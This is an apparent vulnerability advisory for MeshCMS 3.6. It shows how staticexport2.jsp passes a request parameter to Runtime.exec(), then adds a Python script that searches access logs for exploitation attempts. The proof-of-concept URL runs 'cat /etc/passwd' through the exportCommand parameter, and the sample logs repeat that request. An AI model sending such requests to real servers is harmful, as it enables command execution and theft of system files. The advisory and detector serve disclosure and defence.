version 3.6
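Vulnerability description:
The "exportCommand" function in the file staticexport2.jsp can lead to command execution: its value is passed directly to Runtime.getRuntime().exec().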
```java
// exportCommand arrives as a request parameter; the only check shown is that it is non-empty
if (!exportCommand.equals("")) {
    out.println("\nexecuting: " + exportCommand);
    // Sink: the request-supplied string is executed as an OS command
    Process process = Runtime.getRuntime().exec(exportCommand);
    out.println("standard output:");
    ByteArrayOutputStream baos = new ByteArrayOutputStream();
    // The command's stdout is HTML-encoded and written back into the response
    Utils.copyStream(process.getInputStream(), baos, false);
    out.write(Utils.encodeHTML(baos.toString()));
    baos.reset();
    out.println("end of standard output\nerror output:");
    // stderr is returned to the caller in the same way
    Utils.copyStream(process.getErrorStream(), baos, false);
    out.write(Utils.encodeHTML(baos.toString()));
    int exit = process.waitFor();
    out.println("end of error output\nexecution finished with exit code " +
        exit);
}
```
POC:
```
http://127.0.0.1:8080/meshcms/meshcms/admin/staticexport2.jsp?exportBaseURL=%2Fmeshcms%2Fadmin%2Fstaticexport1.jsp&exportDir=upload&exportCheckDates=true&exportCommand=cat+%2Fetc%2Fpasswd&exportSaveConfig=true
```
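For defenders, the request shape above can be searched for in web server access logs. The following is an added example, not part of the original advisory or of MeshCMS; it assumes Combined Log Format, and the function name, sample log lines and client addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format (assumed): ip ident user [time] "METHOD target HTTP/x.y" status size
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

TARGET_PAGE = "staticexport2.jsp"  # page named in the advisory
TAINTED_PARAM = "exportCommand"    # parameter that reaches Runtime.exec()


def find_export_command_requests(lines):
    """Return (client_ip, status, decoded_command) for every logged request
    that supplies a non-empty exportCommand to staticexport2.jsp."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # Last path segment, without any ";jsessionid=..." path parameter
        page = url.path.rsplit("/", 1)[-1].split(";", 1)[0]
        if page.lower() != TARGET_PAGE:
            continue
        # parse_qs percent-decodes values and turns '+' into a space
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get(TAINTED_PARAM, []):
            if value.strip():
                hits.append((m.group("ip"), int(m.group("status")), value))
    return hits


# Constructed sample log lines (documentation address range 192.0.2.0/24)
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /meshcms/meshcms/admin/'
    'staticexport2.jsp?exportBaseURL=%2Fmeshcms%2Fadmin%2Fstaticexport1.jsp'
    '&exportDir=upload&exportCheckDates=true&exportCommand=cat+%2Fetc%2Fpasswd'
    '&exportSaveConfig=true HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /meshcms/meshcms/admin/'
    'staticexport2.jsp?exportDir=upload&exportCommand= HTTP/1.1" 200 812',
    '192.0.2.12 - - [01/Jan/2024:10:02:00 +0000] "GET /meshcms/index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, status, command in find_export_command_requests(SAMPLE_LOG):
        print(f"{ip} status={status} exportCommand={command!r}")
```

Access logs normally record only the query string, so a form submitted by POST will not show its exportCommand value here. A logged 200 shows that the page answered, not that the command ran.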